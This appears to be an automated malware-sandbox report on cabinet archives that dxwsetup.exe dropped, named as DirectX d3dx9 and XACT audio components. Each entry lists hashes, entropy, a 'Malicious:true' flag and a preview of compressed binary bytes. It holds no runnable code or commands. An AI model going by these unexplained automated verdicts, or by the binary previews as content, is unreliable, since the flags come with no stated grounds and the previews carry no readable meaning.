                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:acfUVHkSDmhcG/IQtmLMLfNYIpTTHh0am4l76wbh:XUBvDzfQtCMLfNYqXqal75l
                                                                                              MD5:05103E47F259FA22D27C871E4CDEE7D9
                                                                                              SHA1:502FA5D15FE56DCF64431BB7437E723137284899
                                                                                              SHA-256:794E23D8B08F88BB0D339825B3628C24CD0297195657F9871EE6324786FADA36
                                                                                              SHA-512:180E0ABBD97B6781C6639C6AB2A2355400B8E32784A8469C3CBEDEA23B121CAC5BA17F6AA509610D0A1E5830735455690F574054D6224A6A5D2AE70EDB601835
                                                                                              Malicious:true
                                                                                              Preview:MSCF....zK......D...........................zK...#..............v...7..........2b} .d3dx9_26_x64.cat..|9.7......2]| .d3dx9_26.dll.......9....20| .infinst.exe......:....2.} .d3dx9_26_x64.inf.&...r.:....2.} .jun2005_d3dx9_26_x64.inf.XW&..8..[.... 6.q.....#Q.P...M.$=\7....O.m...D..)j......J.W."...z...B.........<$]@.f.hf....../..K....(`.P.. ....d}.U....rW.q...U..z.3)K....Zl.cI.Fm..7..D.AS..* .H.25@........1....0n(....vs.].mJ..0...Q.A.....c.+P>......O..3)s".N..!..L..':....B.L...h)s.`.U......L....Bzj..%...H2r..J..rP.~.a..T.[.Oc...N!(0..P.B....|Ih...5...A.|.a...,.x.Qa<..~aCT...@...|.G1!|.|!..I..".. z..........S..C..Q.O....x..>...e..C..7.l1l ...@.YD...~L{.)......f..T.Y{...R.!a.}.hAs5..o9..4.w.#.........?|..+.$.r...KG........Q<.KR.....%....W:..8.....ET..>D.[T(..?....I.R3...W...4..C|....v..0.....`.e.Fp|>.<+Q..-..QS/.p.).qZ....GsV.f..PN"5..P>.K..e.Q.~..A...3|..E...D&N:.%...O.......^cc...O.........s.].=,#.je..No.........G..x..#.xg..D.s..}.L.`..|....N`.N......&W..P..
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1344582 bytes, 5 files, at 0x44 +A "d3dx9_27_x64.cat" +A "d3dx9_27.dll", flags 0x4, ID 6663, number 1, extra bytes 20 in head, 119 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1353750
                                                                                              Entropy (8bit):7.999671999388792
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:eG/1unuf7Ga2dGKSnUG+zOADaZmd+JzQpymAFVZcRVhZ9k7LN7QDKW+L:eg4G7GaISn+6FZC+5vmC7EUNRWU
                                                                                              MD5:A9F4068650DF203CEE34E2CA39038618
                                                                                              SHA1:CD8CAECEECD01DAC35B198B42725CBEB5B7965A7
                                                                                              SHA-256:3500C1A7CFB5594521338D1C29946D1E4FFA44D5B6BC6CF347C5BBBDE18E94DC
                                                                                              SHA-512:C92FB461B53051A22FB480BA5B6BF2706614AE93BE055B00280BE4DACE19C1F2A9327106A71851B0E42F39E4172EA3A027F7CE878BCBCB252B723EEA49DBCF1B
                                                                                              Malicious:true
                                                                                              Preview:MSCF....F.......D...........................F....#..............w...<..........2.. .d3dx9_27_x64.cat...:.<......2d. .d3dx9_27.dll......7:....29. .infinst.exe.&....-;....2.. .aug2005_d3dx9_27_x64.inf......1;....2.. .d3dx9_27_x64.inf....p.9..[.... x.m......R.P...?-.."..."-..%V"J..J ...E.VPU..*.2jC..UJ...^P.a..T.A..,...;.......YI...K.....!.N...s..f.m...Q.........<X...J]G2.... ..A..l.m........ .......@....2sx2.HH.....@dC...pWCy/....!..k.GVc.).1q.P.=...b.ua.%ER.q...t.>q.?RVa..$..j.|..'..RZ.Y..zn.c......q./.2G2w...|p4Q.Q.F...X./..~......F[$..!.#..Q....$*.P|....tE..../...3....a.....y...'...[6..^@.k...+.y.:..h_h.8..C...I................3.<..*.#....0.x.....?;!.g.......t.p.o...2!.x..M....~.g..~..hH...KIx.g...-....IX.Ru..P....J..{|,.3.#.wz........K...W.Y.....}..d.l...\..P.z...[HoP.....X...f.5.=b....hy......Jw...q.N'r.B........\.x..J..c..`=&.L!...R.......y..]x......~......s..}..'..S|n....%3.=........Z..T..._./(5\[v..r....~.....I.!..cjv).M...x....(&.(../.:q..1.......
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1352016 bytes, 5 files, at 0x44 +A "d3dx9_28_x64.cat" +A "d3dx9_28.dll", flags 0x4, ID 6650, number 1, extra bytes 20 in head, 119 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1361184
                                                                                              Entropy (8bit):7.9996739284035945
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:MWKJ8/HOO46naMPT4WtPIDONJkwzpow5Xl6tgvmKSGfEov6tTc1RImGLtqrtYEm:Mj+146nP3PIabkUl6tg+KSG8o2TcRG8E
                                                                                              MD5:D964ED45FF274DA2C8F48E2CBD00AA9F
                                                                                              SHA1:5C2E5607065238FB24A0B65DDFC904406615E2A9
                                                                                              SHA-256:DAF10A54089755F9A8ACEFF0C7695F1AA42D35E3179DA5B9BB91E409036AE547
                                                                                              SHA-512:A74E2DD4BFB037E5F5A1DEAA86F9C4A354F023B62E1F2075509FB707EEE1725B1136441D1059BD3929AF1A44F6372DABEF9CD15D386A77B2B22A532B74CF16AA
                                                                                              Malicious:true
                                                                                              Preview:MSCF....P.......D...........................P....#..............w..............3g. .d3dx9_28_x64.cat..6:........35. .d3dx9_28.dll......U:....3. .infinst.exe......\;....39. .d3dx9_28_x64.inf.&...2_;....39. .dec2005_d3dx9_28_x64.inf...;..9..[.... &.m......R.P...?..R...A...8..(...J....H".VB....2.R.H..M.R.)U*.Rm .3.E#.....`.;..>.c..}.H...Nv .%@.mg..c....o:Ll...9...s...H..i\.e.t!..`....R.?.......@......F..o.......H0....vd.I1.x@.b..`.go.\..C...... .E.x l..xY.eHeE.."....o..J.....=...T..`....0o.(..%.Y&v...S...&.....h...HZ.2J.S^f1Xn.+.....WR....$B...H.......G...?y%.$....%?.A.%a...G]..F.sA./.-.R.7.f]@ ....t...D...9.....././....M/..A.yJ..\Io~I...G.......<Gt...7.!.g.".....t.r.w...f....N.6"4.>..A!.M.]u.~.G.^S..\/a../Y.=..u.U....d.i~.K7..<...e.b..G...~].....=isb?.fa6.._..p...X....P6<.k..[...l.`.........~/....D[c...'.]B..zE5...s..N].x..J.....h.&.,. p..an..I..w...y.....z".>.3_0.9. .....Z.U..3.=.......J.yHE.IU./!....._......O..`..%.0.X..5.jd.../bf..=(.**.....n.....Q.*..
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1356836 bytes, 5 files, at 0x44 +A "d3dx9_29_x64.cat" +A "d3dx9_29.dll", flags 0x4, ID 6656, number 1, extra bytes 20 in head, 120 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1366004
                                                                                              Entropy (8bit):7.99967777757325
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:Qllh+6W44yAAf47xvIWTTbTpHe3Agqqvx3C86vBOZw1b4oWU+vz3zJvxfIc:Qh4DhlgWRHeQgtvx3FABOCth8vzN7
                                                                                              MD5:33618039DAC4E97C813E5BC1A499E6C6
                                                                                              SHA1:C792B9D0134DF698476C2FA4179DE6BCE8AA583B
                                                                                              SHA-256:A5FFAF9D58DA5D79402C4DC93E79960F971D2701D4651BB33D18925AF641F11D
                                                                                              SHA-512:35B490903721CA5FAEF73815D4F9C6F52EFAB1FE82A4FDBD7566A1B028525AFD29A72DC68D4B7D219CFA5CB33FEC241D6B2784F15F9795D368DC356B3DF30B5D
                                                                                              Malicious:true
                                                                                              Preview:MSCF....$.......D...........................$....#..............x.............C4.F .d3dx9_29_x64.cat..t:.......C4nE .d3dx9_29.dll......:...C45E .infinst.exe.......;...C4iF .d3dx9_29_x64.inf.&...2.;...C4iF .feb2006_d3dx9_29_x64.inf.l..3.9..[.... .q..@..$Q.P...>..$....)......2.k..LJ.].-.K+.E-h.k/Z.....Z..=....... b..=.o...........$.h...bT'7f.Q..2..;.o...M<C.u....xx..%..Z><..!_&'.Xq1E.Q...Q..[vP...d.I...........".(n(.....n.M....XA..J..C. ...c\*.....<......w.r..I.m..FM#....f..tdbdPR..Si:.:BQ...."..-.%...1U%.."Y..B.%.xF&S.V.<.).......6.^...D.(.eI.`.".p..?b..';.$..X.......H...$+...E....:_.b.(.0JF..E.w_..,..+.....$....+..AMBP..f.5..'....3 n.|...B ...0....t,.j.N..v}...WG.L.]..l....Q5..5..B.....X...^....U.~.x...%.....&wG/.5t.........T..G>.YjJ.].[..M^O......;.,.....]...1..__.K)sy...?.s.%.u.....a...!~..8.......F.^.%)N..c.J#....).`-.lz.T]..._..{..4...z?..p...H..%9)....y2.......S.{..h.K.....toRgh......D.V..%.?.|.?V.Vr1.......Jd..zz..C(.'...,.!.X.-..o....O...V!"..8..
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 126449 bytes, 5 files, at 0x44 +A "xact_x86.cat" +A "x3daudio1_0.dll", flags 0x4, ID 6923, number 1, extra bytes 20 in head, 8 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):135617
                                                                                              Entropy (8bit):7.992141777548868
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:EaLgbEzMsJxjJDOAfpPt4HvbVs/m2EKtaVNRF+kA5Y0L5XP/JwObYeM57H:LkgzfxjUWL/3EKtqNlGYeXqObkL
                                                                                              MD5:FEC720C0C15C43569EA9FAB7CEAFEA95
                                                                                              SHA1:C65235B40865725A00675F1BC013BA8B77307669
                                                                                              SHA-256:6456FC26622F3A72B9449ED0E61874CF1ADBA23CCCBFCDA1324F033FE0788FDA
                                                                                              SHA-512:8EDEE940930E3C610E709E2C6348ABAB479628BFAC71A0C507F46AF8D80F1F0C6E31C7C44AF5F884668CE472B281FF18CB44A97AB68232D455B7BC8F89A75268
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..................! ........C4.F .xact_x86.cat..6..! ....C4-E .x3daudio1_0.dll.....V....C4CE .xactengine2_0.dll.3.........C4iF .feb2006_xact_x86.inf...........C4iF .xact_x86.inf......8..CK.|.\....l...X.".....Y2..ET.$..dd.$.........'...*....1..|;.b....=D0._.........{....twuUuuuUMw.-..1RR...{.;u.2.0... U*..U.U....4....s.7.T.(tJ..*.0.^..S8KIU.dQ(tvCdL...'G........{..%n...r.&....T....P...m0.....1{x.a..;.<0+..0[..0..8.x.'.<...r.Pv.Z..l...p.0..f..G.n.J.N...}.9@i...07..V....:.....8.'[...p(u....%...~.T*...R....D.Z.....Q....m.Y......1...%bq..ng..M..M.8....\/....D....M...A.+...zaK...$.8...d.%u....&5..9.....k(#=9@.._..3Nm..M.7......s...f'....... .')..).N....=..!.....HrDg..6.t.z..KxT.^....0.H..P.....[..Vv..jg.:."p.........a.A$.` ..'..0.....dgAw.qCc.,.K.|@.t...t6....8t...m.[..Hl7..K...[.m#.Z....~.%{a.6..t`...z....F... ..u..yK..,y.V!o...W.;.y.t.k.D..p./.Q)T*{..>.k...<.=H.V....c#...*[LFEZ0]I.:.....S...'..%s<.R.
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 172399 bytes, 6 files, at 0x44 +A "xact_x64.cat" +A "x3daudio1_0.dll", flags 0x4, ID 8042, number 1, extra bytes 20 in head, 14 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):181567
                                                                                              Entropy (8bit):7.99567918868168
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:d0F/biJLp9lt7vCmPW8+bobje8bRuaUDuHxiViqmFT8K9rz3a9cO2A2XSHao4svF:KqvlhXu8++q2WuHYrS8ky2A2XKJvub/I
                                                                                              MD5:582102046D298E7B439C819895F6061D
                                                                                              SHA1:09900F44668350118589F18C693B131D7C1F9238
                                                                                              SHA-256:C91A6380C65853E41E2F9593B954F3B5AF49BCC894476D8EB78CD9F8B6DD7DA4
                                                                                              SHA-512:8AABBCBC88489FF8828D532BE5C1BC0D33D7960F41C7B38348AAE73BA4777999F4358466D061DDD8291DBD434E7741EE2C3215A10F8287BE36209E0842C4EB2D
                                                                                              Malicious:true
                                                                                              Preview:MSCF....o.......D...............j...........o....#..................! ........C4.F .xact_x64.cat..@..! ....C4)E .x3daudio1_0.dll..l...`....C4OE .xactengine2_0.dll...........C45E .infinst.exe.z.........C4jF .feb2006_xact_x64.inf...........C4jF .xact_x64.inf.....&9..[.........R.P...O....5p.R...1.!..).a. G7...QJ.........%.G*$...Q.....D..h....v.....f.........q.lv...7.(s@.1.;i..R..7....9+.t<.F.1.84.D...{........f.......iYFdP.Dc.xG.. .0...;...B/IN..x/.w.b..]I... .WAJ.......6....J.8..@.....r.s..NV.#..D.+.c.Y....WQ....'..)`..,.BR.8+I..@....L.9.......8......y...0.u.@...R.../..W.#F...Y].K..C.....t.<E....B... K...A.....<....2.@......f.....`...@x.'..Y.Ab.G]a..X..2.......B.Z.i.../.z...+F.....w..:.+t......e...y.=.a......z.} ..(.{............~|....._Ai=..m.7..s.%...C.H.m.I..PA..O.$..g..PG.2.....5.\...P0.....z.a..#..?m....%.B...T.......v.u..E....3t...G.^......Q..+0..Q...t.....J...!......Y..+....y.w.".Z.@............P`......G....$t..W.'.?....H.^z~./...p..V..I..X...$p..^...
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1391870 bytes, 5 files, at 0x44 +A "d3dx9_30_x64.cat" +A "d3dx9_30.dll", flags 0x4, ID 6646, number 1, extra bytes 20 in head, 123 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1401038
                                                                                              Entropy (8bit):7.999678252363499
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:qpSOf0NLgpl5UCjJlezBreTxpgDysu8tyDJhllXCQaXVVeOYa54Sx0HfWyRA7ydL:80xgpl5UCLezBrg4uDDJhlAQQn8Sk87a
                                                                                              MD5:5EC6F520F3AFCC6494AB0D43B690EBD4
                                                                                              SHA1:2359E14CB6DA44AA89A3815E905D6FFD81960D02
                                                                                              SHA-256:27D99894E2A68601F46487C9999723DC83BCC9C6F903F2E2622D05668035B015
                                                                                              SHA-512:9DB4A9581EDAE2681491D5E13228642737D0D186E0E1672B063482B2E699274ACFCB81DFA9631902E93E009ADC0BBD9447061830C8CE2FEAD6743E2D45AAED60
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....<......D............................<...#..............{..............44f .d3dx9_30_x64.cat...;........4!e .d3dx9_30.dll.......<....4.d .infinst.exe.&.....=....4.e .apr2006_d3dx9_30_x64.inf.......=....4.e .d3dx9_30_x64.inf..vs..9..[.... ..q..@..$Q.f...>....".}...W].}.uL.E.2H]..T.i%.h-...%ZX.<x{.ZX............GC......|/M...H....zh.n...S.0.I%&....E..Kq..g.....#..!+.....X.<.]..-N..1X.E.qg....6..O....{...Q.."..!"...M..R.ff.]...n...KG.x.T...{.@E1~.{@..+..f..}.EkQ.....B......Gg... ..E0.D.$. ...r.+.;Td4...2..........z..:J%..S.g.Z....._.).*.H...)!...T.....AA..b(.lH..-9&rp....9"r\..s..)........%..._2<..R.t..l>z.;...........3!..U..~..O....!.......\vo.%...q+.B.b2'.....z..W..A...5..B...6..B..B.....v.AZ....(....;.2..8.....M..is..mn.9..]..Ys.X"..&...R....S..........%.o.s./.P4......U..O.'.W...n-&H...(.9*:.x..zT9.(..D{L.....M.-.....N..U....n|.y......{r..Y.I......b.0..P....a..|..F:...)..U9=...g.........!y.........e.w...K.i.\.8Z....O..O.c.\.'...@./..!....aM.<.
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 127143 bytes, 5 files, at 0x44 +A "xact2_1_x86.cat" +A "x3daudio1_0.dll", flags 0x4, ID 7334, number 1, extra bytes 20 in head, 8 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):136311
                                                                                              Entropy (8bit):7.992811243778454
                                                                                              Encrypted:true
                                                                                              SSDEEP:1536:NqvFmCDJEmTNSPtjVgIc5Ul8IlTq3UJWaL6LHZF/U7a7b0qJFkd22ig3nQ1d7+Z/:NYmCyC5U+Il0yWYSMaXzkYQ3nWUZDuY
                                                                                              MD5:A2132A62F9AB0BDDC3207166DC014581
                                                                                              SHA1:53B19AC3E6C6752011BA641EE3C409ED10C95DD9
                                                                                              SHA-256:52C71C89CCC22FED3D7C985A22C464451AF34B63B3A26A3799BC25D881221EBC
                                                                                              SHA-512:76FABD7F440B6F9B409B0B2635EAD4EF332563A9BED738A722A7C6B9A077094154BF735CAF02C67191B08AB0A19FC03E05EF3D984F6E34DCF3BD587A05D2F424
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..................! .........47f .xact2_1_x86.cat..6..! ....C4-E .x3daudio1_0.dll.....V.....4.d .xactengine2_1.dll.W..........4.e .apr2006_xact_x86.inf............4.e .xact2_1_x86.inf...9..8..CK.|.\....l...X.".....Y.. y......EVI..... *.rzz..D..t.b....EO...((.S.TL.....]............u........j.{h......E..Q..E9.u..R).n.\E.a.N..30<.~UI.L.B...R.r.U...YJ.. .B...F..W3V..,..L,.g.S.G...\+.f...I.z.t*.JK.s(F. +....f.yBn...cv.-.. 7......n..0....9.<Q...za.$...0..}...n.J.s..@|d.H.b.,....c1..K..1>&....p.....Xh.?,._[..X......q...GT*7..2....V.l.....<(;@..?O.9)...k.%..8.. ..<[..a.T*h.2..........H.#.h...Qp[w3.A...f.!..ew..l.v....~...=..=`....".......z..d|"n......Q.EE..p4&Zz........?..@4;...k....x.R.H...p uf.7.yA..)....wRf/.."!...l..5.C..+..W.>..Zy.qj.....(.....{....4....`,...^.p'R.l.F..qP....{.nc."..m....5.".i.7.q.R...d/..f6..l..Qo6.......Fb]yn..U..lE~T..]..}........[!.....F.P..'...S.....V...w+....)..W..2*.B.J..In\]\....p.P.OK.
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 173173 bytes, 6 files, at 0x44 +A "xact2_1_x64.cat" +A "x3daudio1_0.dll", flags 0x4, ID 8453, number 1, extra bytes 20 in head, 14 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):182341
                                                                                              Entropy (8bit):7.996367169399176
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:iP7n/mIkqSEiqQAK23yLLBIvm2dozls4yaqS0yaP/Y5UZEPnQ79:iPL+fRqQAD3Tvxd8l/zsg5UZEIp
                                                                                              MD5:6CA70CDB3FA575506BA4035E9A50D8E4
                                                                                              SHA1:A2A20F5F95A1AB293A188A55BF593A82EA0DCB7F
                                                                                              SHA-256:F82B2043B470BF0E711C3D05D758A379920340212437917B5D98AF0C14E7BFE0
                                                                                              SHA-512:A453CED526332ACE37861A0A862FFF3710EF74ED57965F28DD279F526A2F33C390E82FD2C49BEE75476E5B4C349C40A71EEE49EDAC720236A16780DFD700FE62
                                                                                              Malicious:true
                                                                                              Preview:MSCF....u.......D................!..........u....#..................! .........46f .xact2_1_x64.cat..@..! ....C4)E .x3daudio1_0.dll..`...`.....4.e .xactengine2_1.dll............4.d .infinst.exe............4.e .apr2006_xact_x64.inf............4.e .xact2_1_x64.inf.....9..[......Z..A.P%..?.....DIx?...=HG..R.62^...T)....:.A.8..;.$.(..8.-......(..{.m...w.{.M...H.a....:.\^.S-R....c...u.k.^..q...5.bbK.0i.w.U).........C3..0.............."..3}...n..n..H. .((...B.l..#*hp..(>.."-a.|.[TuB..1.V....L..B....^Pi..`.b.....Sx*C...%.$.!....L..`.A..4.f.\.a..s......319..2..0QP..j.&.P\.B..z.~.P..P..$O...pI....o.T.F.../.d..g4...@EX...$I.2.....r.....B...A.....:.....HH5.....h... ...^.3.T...w...;...n...H......M...R.*..W .y.H....GD...Q..%..........DJ.6.#.."G.}@/|.....-A....W.....J..d..1....'P.......|b.$.z..yL..Jg...._r..W....P5.Q`...qyy.. ..s..p.<[.fr!.uv:..3.Y..9j.#or.A.<..T....7*}.F..d.:.]......>..:...Qs...a.C-...3}..r...#AU..O?=.2.T...e...e......p.S...4.....`....9|..~R.I....
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 127711 bytes, 5 files, at 0x44 +A "xact2_2_x86.cat" +A "x3daudio1_0.dll", flags 0x4, ID 7347, number 1, extra bytes 20 in head, 8 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):136903
                                                                                              Entropy (8bit):7.992894428315885
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:D12mlhVvEbdSlFHljhuz+iFmKtp5LW+pc7Y5EExt2KF3:DwkMhqjhuz+efdLy7YSEP2KF3
                                                                                              MD5:CFCCA19D60EC3D822ED5EC8BBADEC941
                                                                                              SHA1:AB0E87182877991810AF48F1478906C1E671829E
                                                                                              SHA-256:23495764ABA10FF35CF9D23AEEFFDF38716219D8A155AE29162F01F7FE6A30CF
                                                                                              SHA-512:2ACAEA2DE2D77BBE8206E8309D48A4CBA432D72FB9BDE2576BCE7A31EE29FDCB0D44C2B996E8DC21A31BCDB03C806E11AD53B74D9C4C972436D5202825900C01
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..................! .........4=< .xact2_2_x86.cat..6..! ....C4-E .x3daudio1_0.dll......V.....4.; .xactengine2_2.dll.W..........4.; .jun2006_xact_x86.inf.....`......4.; .xact2_2_x86.inf.r....8..CK.|.\....l...Y.".....Y.(H^.@.`@$,.Jr...#..+.....'b.'f.......x;..S.TL.....]t.w...{.{..s...........8f.ZC..._.P4..y....R(......'.j...<.%.-k.....M).W..8...V.Y....2`O..>q....jO..1....;.\{...'.=...+-.....:`.....c..t..1o..`<..0G.y..e.r|..r>P..9.({C-.r.@..8~..qs...>6G.r.....@...]0/..Vl.....q....l....j..... .#...o..J.p.6..:w.>..W....iTFi)..<..s#.AX.&..dL.I.vG?.BM.t...._.X...a....%..Wd.*5.$.#{..?G..Gj..ds.._..7@.@JG.G~*]:.=v&..'u.......bb...`g......`..s.)?Rj;..K....#..Im(.....Lq.........'5..p...xl.^..!.05H..P._*.....hf..3c{.H..I|........DB...9.?1..y...}.&;..c......tl...w2..`.:......q{s......`"...R..p..W.p.....vc3...6A..;..v..`b.D..<W-o.....;.....jy.2...zm..t.n.R..B..G...Vq.....).:.M...Ha@...Q..N.0.N.......4`E....(....
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 174825 bytes, 6 files, at 0x44 +A "xact2_2_x64.cat" +A "x3daudio1_0.dll", flags 0x4, ID 8466, number 1, extra bytes 20 in head, 14 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):183993
                                                                                              Entropy (8bit):7.996017590596314
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:fC8YuRPaoTUX/SmAwGUGY+geIhVhbjF/kZ8FyQU02JhzqhA7J4rMgThmwQvzb7e:fCoJaoT8/2Z9YA+VhbR8Zwy3RimwQvzm
                                                                                              MD5:D404CCED69740A65A3051766A37D0885
                                                                                              SHA1:288818F41DA8AB694C846961294EE03D52AEA90D
                                                                                              SHA-256:5163AFA067FE2F076AB428DD368BA0A2CF6470457BA528A35E97BE40737A03C0
                                                                                              SHA-512:87998E67B359C2A0D4F05DC102F6C4DB4F260903385B7558A2C1A71436001D5B18F42B984E6B279A8197243593C385D41F51DE630FA31C5CA5140F6970F87657
                                                                                              Malicious:true
                                                                                              Preview:MSCF...........D................!..............#..................! .........4=< .xact2_2_x64.cat..@..! ....C4)E .x3daudio1_0.dll..g...`.....4.: .xactengine2_2.dll............4.: .infinst.exe.....!......4.; .jun2006_xact_x64.inf............4.; .xact2_2_x64.inf....&9..[.........R.P...?.p.v.K.......AA..;.vDB.*....xUt....=!)"yP..."C. h..F#.....P.l}.epD.....;....7..P...{s7......$.S..q.ce..g8V....&..F~............A.=.....HP@.cB<..FPT....^.......G.....;P.PBz...D...Y.$@..J....5W...%v..p ..D...7.f$)..HyIO.--z.{5.H.;.@Z.n...T)H..G...|....T.. ..!.u0.^..*...0$`...L8.]..h=..@...L....|...4=.z......l.H....h-..l..2P.].$.....v.7...]......K..=`..?......g.....................D*".0....X...0....m.....;..8.1..bCF..J....Mq......V..@...... ..bz..ox...7t...X.~...@...n...........+.V...{..x..(y../o....Q.TC.=..... h...S<J.1...Or...|O.........}.!..h(`.W...t.l....w.m.....1d......~?#..#.K../...."..y_...z$}..s..q.W.....6[.......*x.~H..(>%.R=.....7...=G...Q.........X./.......Ot.
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 131275 bytes, 5 files, at 0x44 +A "xact2_3_x86.cat" +A "x3daudio1_0.dll", flags 0x4, ID 7334, number 1, extra bytes 20 in head, 8 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):140443
                                                                                              Entropy (8bit):7.993872348182751
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:ZLkEev6VCdOQKPuF/p+emNC4J962LGMlPj6MoCW37gwND08:ZLkEeKCdsPufE59tLGMpxobsG08
                                                                                              MD5:E16F0875713956A6F9CD8C5ACAD36E51
                                                                                              SHA1:984B821EAEF3B549CE0B12F72A405A93E51A9DFE
                                                                                              SHA-256:31B16F93BE7F5F9BB78E9ECE6DA96565D50A0BC1F66B206B7A21C601A308DC53
                                                                                              SHA-512:DD626D5552EAF0C1DBD32BC4DD84811BACE74C6350EDDAC692D3C3E8C393F4A19C26E8F2932F54A14648448912E6B87C796C6EEB6DA9B2C55EC4565983B76189
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..................! .........4.R .xact2_3_x86.cat..6..! ....C4-E .x3daudio1_0.dll......V.....4.K .xactengine2_3.dll.W..........4{R .aug2006_xact_x86.inf.....`......4{R .xact2_3_x86.inf..v`..8..CK.|.\S...M..ABS............ M....%J3...EP....]W,.X..............]El.;s..t............9s.3g.9wf.#.....W.X...K-..t..>.B.v..t..;....._...C.S.\.)%y.*...Y:.Z .B...<...M^..N....e..v5.]pWG7.+..7........2.<..=...`n..s.'..1w..R7x.!.A..u.H.0g.....~<H.....C.?@]1.......R...<.....m.M...I.B..L..c).....~.m;..M].L......].........+..GT*w..n....!. .3...0Gl .&..;....E..ZW...........+..,*..Z....#bG.v.2...R.~...`.p.....?.q......6.$[.+.8 .............V4...\|Q.Q.....A..^4*........A.o.,.....O/X..^..5.r.....XQ.iGh.|I...r.A:'.p!u.L>.\..i...HgN...)q..q7.c..w...Pbm..a.O%y.......X..ne....2. ...w...`.:..5....]p'.......X.k.Hv..nGR.x..p.-..f...lB.QG6.........`.yn..c..4m.].].]..cXI^....N.=..F.P...-.].....fj..w3n...)..W.r2*.".:&.1|..n..L.V.P"
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 176943 bytes, 6 files, at 0x44 +A "xact2_3_x64.cat" +A "x3daudio1_0.dll", flags 0x4, ID 8453, number 1, extra bytes 20 in head, 14 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):186111
                                                                                              Entropy (8bit):7.995685991314543
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:yglGrmTM3Ne3LnSYZr66OltMlRz/EFa6xoXJMOL7CmAvyl81g5K7VQLWRrZL:xESKSRr66OltMlWFa6xoMOL7vmGGCArN
                                                                                              MD5:4BA26F9DCCAEBD7BE849A076EC82D6FF
                                                                                              SHA1:42FB0D0089D8BC92735820F475968F59AF4E4365
                                                                                              SHA-256:13E7EB934A7596E7C3B7D8A0962E68DA841D9C73D154825DC982FF6D05CFF221
                                                                                              SHA-512:4E4FD8A31AC3C2F8CC66D434103C0097AB3FBE2C2E8140AAE2F95FC4AC1927AAE9CDCE8730DD7C4DAD785D9A653D90B0F914B258BB5695C68CA93F605AC82DD4
                                                                                              Malicious:true
                                                                                              Preview:MSCF..../.......D................!........../....#..................! .........4.R .xact2_3_x64.cat..@..! ....C4)E .x3daudio1_0.dll......`.....4.K .xactengine2_3.dll............4.K .infinst.exe.....!......4{R .aug2006_xact_x64.inf............4{R .xact2_3_x64.inf.+.{..9..[.........R.P...O...\7.$Hb...l...RI..(D7...G.)..0..J.zH)J.R..x$..H...........>>.evHh......;....d....xT6@'.u...Q.n...#s.......!.Pq...o...... ......X....,-....h... ......q..G.. ,.........(.~.CzJ8t.P..J.FHR|.D.........` d..PC/.N...I...<.'.o....8.t..t7.....Q.E%.J..8.l......t"....Z....&.(.p.:........n.ML.@..Ny........9......P'.|...w..@.{B!\.h.P.....:.G...t g.."..{.@'..u....z........|......#A..8.q....v..E@..g.@.~.\i@......`9..y.G..p._.b...C%K.....Y...6R3...v"..J.a>.Co.dcEOv&D:...~.A.Y..^......{.x........`n....].D~.E...(..^"..N'....W...g...?....9.}.?.....z.3q.......Y....AV.?_0.w[..F.......CU).76....6.O.C......|...I...@...|..bC..p.S......l... .H<.S.I. .f(..`*^..Y..W...._....0_...._9..yj.+X
